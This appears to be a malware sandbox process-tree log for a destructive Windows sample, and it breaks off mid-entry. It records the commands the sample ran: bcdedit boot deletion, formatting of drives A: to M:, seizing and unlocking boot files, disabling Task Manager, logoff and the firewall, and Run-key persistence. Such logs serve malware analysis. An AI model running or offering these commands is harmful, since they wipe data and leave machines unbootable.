        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A969.tmp\A96A.tmp\A96B.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        6⤵
        
        PID:4880
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:2680
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        
        PID:6844
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:4052
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        
        PID:5032
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:3856
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:4292
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        
        PID:3716
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:2116
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4320
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        
        PID:2288
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        
        PID:4396
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:4908
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:4708
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:6128
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:6984
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        7⤵
        
        PID:7132
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        
        PID:6336
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:6596
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:7056
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:5660
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:7092
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:7164
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:4432
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:7136
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:5892
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:5248
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:1048
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:156
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:6372
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:6628
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:5568
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:6432
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:6644
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:6016
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:6864
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:5580
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:7348
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:7528
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:7684
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:7840
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:7884
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:7932
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:7992
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:8528
        
        C:\Windows\system32\reg.exe
        
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:11152
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:11900
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:11932
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        7⤵
        Modifies Windows Firewall
        
        PID:12396
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:1956
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:1060
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:848
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        Drops file in Windows directory
        Suspicious use of SetWindowsHookEx
        
        PID:2300
    - - C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        5⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:2228
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\AA43.tmp\AA44.tmp\AA45.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        6⤵
        
        PID:4968
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:4184
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        Modifies file permissions
        
        PID:6872
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4132
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        
        PID:3952
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:3852
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:4176
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        
        PID:808
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:4340
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        
        PID:3836
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        
        PID:4312
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        
        PID:4524
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:3092
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:4136
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:5136
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:7024
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        7⤵
        
        PID:6100
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:6644
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:6796
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:7120
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:6248
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:6532
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:5128
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:6396
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:6688
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:6320
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:6100
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:6344
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:6524
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:6664
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:6784
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:6940
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:6436
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:6920
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:6736
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:7200
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:7360
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:7596
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:7652
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:7824
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:7876
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:7924
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:7980
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:8040
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:8716
        
        C:\Windows\system32\reg.exe
        
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:11204
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:11948
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:12512
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        7⤵
        Modifies Windows Firewall
        
        PID:3728
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:2288
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:2168
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:2744
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        Drops file in Windows directory
        Suspicious use of SetWindowsHookEx
        
        PID:1744
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:808
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:3256
    - - C:\Windows\system32\reg.exe
        
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:3728
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:808
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:4196
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4292
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit /delete {current}
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:4708
    - - C:\Windows\system32\msg.exe
        
        msg * Virus detectado
        5⤵
        
        PID:4840
    - - C:\Windows\system32\msg.exe
        
        msg * Virus detectado
        5⤵
        
        PID:4916
    - - C:\Windows\system32\msg.exe
        
        msg * Has sido hackeado!
        5⤵
        
        PID:4216
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\drivers" /r
        5⤵
        
        PID:4396
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\drivers" /reset /t /c /q
        5⤵
        
        PID:4668
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\drivers\*.*"
        5⤵
        
        PID:4056
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:4384
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:4328
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:4376
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:5104
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:4324
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:4668
    - - C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        5⤵
        
        PID:3732
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\1719.tmp\171A.tmp\171B.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        6⤵
        
        PID:8396
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:9196
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:8392
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        
        PID:9720
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:9412
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        Possible privilege escalation attempt
        
        PID:11212
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        Modifies file permissions
        
        PID:11528
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:11772
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        
        PID:5308
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        
        PID:12804
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        
        PID:13080
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:6388
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:13000
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:1048
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:5100
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:3628
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:3624
    - - C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        5⤵
        
        PID:4200
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\1A92.tmp\1A93.tmp\1A94.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        6⤵
        
        PID:8532
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:9428
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        Modifies file permissions
        
        PID:9548
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        Modifies file permissions
        
        PID:10856
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:11168
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        Modifies file permissions
        
        PID:11592
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        
        PID:9560
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:1756
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        Possible privilege escalation attempt
        
        PID:12796
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        
        PID:11956
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:12976
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:12080
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:2108
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:4688
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:4932
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:3724
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:1996
    - - C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        5⤵
        
        PID:5024
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\1E88.tmp\1E89.tmp\1E8A.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        6⤵
        
        PID:8720
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:9348
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:9532
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        
        PID:10848
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:11160
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:11568
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        Modifies file permissions
        
        PID:11416
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:2164
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        
        PID:12864
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        Modifies file permissions
        
        PID:2064
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:8836
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:13256
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:2444
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:3976
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:4360
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:4056
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:3952
    - - C:\Windows\system32\format.com
        
        format /y /q A:
        5⤵
        
        PID:5092
    - - C:\Windows\system32\format.com
        
        format /y /q B:
        5⤵
        
        PID:5564
    - - C:\Windows\system32\format.com
        
        format /y /q D:
        5⤵
        
        PID:6096
    - - C:\Windows\system32\format.com
        
        format /y /q E:
        5⤵
        
        PID:6240
    - - C:\Windows\system32\format.com
        
        format /y /q F:
        5⤵
        
        PID:6688
    - - C:\Windows\system32\format.com
        
        format /y /q G:
        5⤵
        
        PID:6408
    - - C:\Windows\system32\format.com
        
        format /y /q H:
        5⤵
        
        PID:5328
    - - C:\Windows\system32\format.com
        
        format /y /q I:
        5⤵
        
        PID:7400
    - - C:\Windows\system32\format.com
        
        format /y /q J:
        5⤵
        
        PID:8896
    - - C:\Windows\system32\format.com
        
        format /y /q K:
        5⤵
        
        PID:10612
    - - C:\Windows\system32\format.com
        
        format /y /q L:
        5⤵
        
        PID:12080
    - - C:\Windows\system32\format.com
        
        format /y /q M:
        5⤵
        
        PID:13208
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\psisrndr.ax"
        5⤵
        
        PID:5900
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\psisrndr.ax" /reset /c /q
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:13664
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:2920
- - C:\Windows\system32\notepad.exe
    notepad
    3⤵
    PID:2620
- - C:\Windows\system32\calc.exe
    calc
    3⤵
    PID:2884
- - C:\Windows\system32\mspaint.exe
    mspaint
    3⤵
    - Drops file in Windows directory
    - Suspicious use of SetWindowsHookEx
    PID:2896
- - C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
    C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:2544
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8B6E.tmp\8B6F.tmp\8B70.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
      4⤵
      Drops startup file
      PID:2952
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        5⤵
        
        PID:2052
      - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1100
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1716
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        5⤵
        Modifies file permissions
        
        PID:2296
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        5⤵
        
        PID:2992
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1968
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        5⤵
        Modifies file permissions
        
        PID:1624
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        5⤵
        Views/modifies file attributes
        
        PID:2016
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        5⤵
        Possible privilege escalation attempt
        Suspicious use of AdjustPrivilegeToken
        
        PID:848
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        5⤵
        Possible privilege escalation attempt
        
        PID:880
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        5⤵
        
        PID:2104
    - - C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        5⤵
        
        PID:1768
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        5⤵
        
        PID:760
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        5⤵
        
        PID:2372
    - - C:\Windows\system32\ipconfig.exe
        
